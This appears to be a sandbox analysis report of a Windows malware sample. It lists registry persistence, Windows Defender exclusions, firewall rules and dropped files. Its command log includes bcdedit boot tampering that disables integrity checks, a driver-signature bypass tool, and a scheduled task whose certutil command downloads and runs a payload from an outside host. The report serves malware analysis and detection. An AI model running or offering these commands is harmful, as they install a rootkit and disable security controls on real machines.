Technical Information
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'GreenShadow' = '"%WINDIR%\rss\csrss.exe"'
- <SYSTEM32>\tasks\csrss
- <SYSTEM32>\tasks\scheduledupdate
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%' = '00000000'
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\rss' = '00000000'
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%APPDATA%\EpicNet Inc\CloudNet' = '00000000'
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%TEMP%\csrss' = '00000000'
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%APPDATA%\GreenShadow' = '00000000'
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\windefender.exe' = '00000000'
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%TEMP%\wup' = '00000000'
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '<DRIVERS>' = '00000000'
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes] 'csrss.exe' = '00000000'
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes] 'cloudnet.exe' = '00000000'
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes] 'windefender.exe' = '00000000'
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes] '<File name>.exe' = '00000000'
- '<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="csrss" dir=in action=allow program="%WINDIR%\rss\csrss.exe" enable=yes
- '<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="CloudNet" dir=in action=allow program="%APPDATA%\EpicNet Inc\CloudNet\cloudnet.exe" enable=yes
- %WINDIR%\rss\csrss.exe
- %WINDIR%\temp\tar40a.tmp
- %WINDIR%\temp\cab3f9.tmp
- %WINDIR%\temp\tar33d.tmp
- %WINDIR%\temp\cab33c.tmp
- %WINDIR%\temp\taree5b.tmp
- %WINDIR%\temp\cabee5a.tmp
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\syswow64\config\systemprofile\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\syswow64\config\systemprofile\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\temp\tare977.tmp
- %WINDIR%\temp\cabe976.tmp
- %WINDIR%\temp\tard64b.tmp
- %WINDIR%\temp\cabd64a.tmp
- %WINDIR%\temp\tard1d4.tmp
- %WINDIR%\temp\cabd1d3.tmp
- %WINDIR%\temp\tard126.tmp
- %WINDIR%\temp\cabd125.tmp
- %WINDIR%\temp\tard0b7.tmp
- %WINDIR%\temp\cabd0b6.tmp
- %WINDIR%\syswow64\config\systemprofile\appdata\locallow\microsoft\cryptneturlcache\content\e0f5c59f9fa661f6f4c50b87fef3a15a
- %WINDIR%\syswow64\config\systemprofile\appdata\locallow\microsoft\cryptneturlcache\metadata\e0f5c59f9fa661f6f4c50b87fef3a15a
- %TEMP%\symbols\ntkrnlmp.pdb\3844dbb920174967be7aa4a2c20430fa2\download.error
- %TEMP%\osloader.exe
- %TEMP%\ntkrnlmp.exe
- %TEMP%\symsrv.dll
- %TEMP%\dbghelp.dll
- %TEMP%\csrss\patch.exe
- nul
- %WINDIR%\temp\cab4c6.tmp
- %WINDIR%\temp\tar4c7.tmp
- %WINDIR%\temp\cabd0b6.tmp
- %WINDIR%\temp\cab4c6.tmp
- %WINDIR%\temp\tar40a.tmp
- %WINDIR%\temp\cab3f9.tmp
- %WINDIR%\temp\tar33d.tmp
- %WINDIR%\temp\cab33c.tmp
- %WINDIR%\temp\taree5b.tmp
- %WINDIR%\temp\cabee5a.tmp
- %WINDIR%\temp\tar4c7.tmp
- %WINDIR%\temp\tare977.tmp
- %WINDIR%\temp\tard64b.tmp
- %WINDIR%\temp\cabd64a.tmp
- %WINDIR%\temp\tard1d4.tmp
- %WINDIR%\temp\cabd1d3.tmp
- %WINDIR%\temp\tard126.tmp
- %WINDIR%\temp\cabd125.tmp
- %WINDIR%\temp\tard0b7.tmp
- %WINDIR%\temp\cabe976.tmp
- %TEMP%\csrss\patch.exe
- from %TEMP%\symbols\ntkrnlmp.pdb\3844dbb920174967be7aa4a2c20430fa2\download.error to %TEMP%\symbols\ntkrnlmp.pdb\3844dbb920174967be7aa4a2c20430fa2\ntkrnlmp.pdb
- from %TEMP%\ntkrnlmp.exe to <SYSTEM32>\ntkrnlmp.exe
- from %TEMP%\osloader.exe to <SYSTEM32>\osloader.exe
- %TEMP%\symbols\ntkrnlmp.pdb\3844dbb920174967be7aa4a2c20430fa2\download.error
- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
- DNS ASK my###oart.xyz
- DNS ASK msdl.microsoft.com
- DNS ASK vs###########ssu5shard10.blob.core.windows.net
- DNS ASK microsoft.com
- '%WINDIR%\rss\csrss.exe' ""
- '%TEMP%\csrss\patch.exe'
- '<SYSTEM32>\cmd.exe' /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="%WINDIR%\rss\csrss.exe" enable=yes"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C sc sdset WinmonProcessMonitor D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD...' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C sc sdset WinmonFS D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C sc sdset Winmon D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)' (with hidden window)
- '%TEMP%\csrss\dsefix.exe' ' (with hidden window)
- '<SYSTEM32>\bcdedit.exe' /v' (with hidden window)
- '<SYSTEM32>\bcdedit.exe' -default {71A3C7FC-F751-4982-AEC1-E958357E6813}' (with hidden window)
- '<SYSTEM32>\bcdedit.exe' -timeout 0' (with hidden window)
- '<SYSTEM32>\bcdedit.exe' -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast' (with hidden window)
- '<SYSTEM32>\bcdedit.exe' -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}' (with hidden window)
- '<SYSTEM32>\bcdedit.exe' -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1' (with hidden window)
- '<SYSTEM32>\bcdedit.exe' -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn' (with hidden window)
- '<SYSTEM32>\bcdedit.exe' -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe' (with hidden window)
- '%WINDIR%\windefender.exe' ' (with hidden window)
- '<SYSTEM32>\bcdedit.exe' -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe' (with hidden window)
- '<SYSTEM32>\bcdedit.exe' -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows' (with hidden window)
- '<SYSTEM32>\bcdedit.exe' -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:' (with hidden window)
- '<SYSTEM32>\bcdedit.exe' -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:' (with hidden window)
- '<SYSTEM32>\bcdedit.exe' -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER' (with hidden window)
- '%TEMP%\csrss\patch.exe' ' (with hidden window)
- '<SYSTEM32>\schtasks.exe' /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://biggames.online/app/app.exe %TEMP%\csrss\scheduled.exe && %TEMP%\csrss\scheduled.exe /31340" ...' (with hidden window)
- '<SYSTEM32>\schtasks.exe' /CREATE /SC ONLOGON /RL HIGHEST /TR "%WINDIR%\rss\csrss.exe" /TN csrss /F' (with hidden window)
- '%WINDIR%\rss\csrss.exe' ""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="%APPDATA%\EpicNet Inc\CloudNet\cloudnet.exe" enable=yes"' (with hidden window)
- '<SYSTEM32>\bcdedit.exe' -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)' (with hidden window)
- '<SYSTEM32>\cmd.exe' /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="%WINDIR%\rss\csrss.exe" enable=yes"
- '%WINDIR%\syswow64\sc.exe' sdset WinmonProcessMonitor D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
- '%WINDIR%\syswow64\cmd.exe' /C sc sdset WinmonProcessMonitor D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD...
- '%WINDIR%\syswow64\sc.exe' sdset WinmonFS D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
- '%WINDIR%\syswow64\cmd.exe' /C sc sdset WinmonFS D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
- '%WINDIR%\syswow64\sc.exe' sdset Winmon D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
- '%WINDIR%\syswow64\cmd.exe' /C sc sdset Winmon D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
- '<SYSTEM32>\bcdedit.exe' /v
- '<SYSTEM32>\bcdedit.exe' -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
- '<SYSTEM32>\bcdedit.exe' -timeout 0
- '<SYSTEM32>\bcdedit.exe' -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
- '<SYSTEM32>\bcdedit.exe' -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
- '<SYSTEM32>\bcdedit.exe' -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
- '<SYSTEM32>\bcdedit.exe' -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
- '<SYSTEM32>\bcdedit.exe' -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
- '<SYSTEM32>\bcdedit.exe' -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
- '<SYSTEM32>\bcdedit.exe' -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
- '<SYSTEM32>\bcdedit.exe' -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
- '<SYSTEM32>\bcdedit.exe' -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C
- '<SYSTEM32>\bcdedit.exe' -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C
- '<SYSTEM32>\bcdedit.exe' -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
- '<SYSTEM32>\schtasks.exe' /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://biggames.online/app/app.exe %TEMP%\csrss\scheduled.exe && %TEMP%\csrss\scheduled.exe /31340" ...
- '<SYSTEM32>\schtasks.exe' /CREATE /SC ONLOGON /RL HIGHEST /TR "%WINDIR%\rss\csrss.exe" /TN csrss /F
- '<SYSTEM32>\cmd.exe' /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="%APPDATA%\EpicNet Inc\CloudNet\cloudnet.exe" enable=yes"
- '%WINDIR%\syswow64\cmd.exe' /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
- '%WINDIR%\syswow64\sc.exe' sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)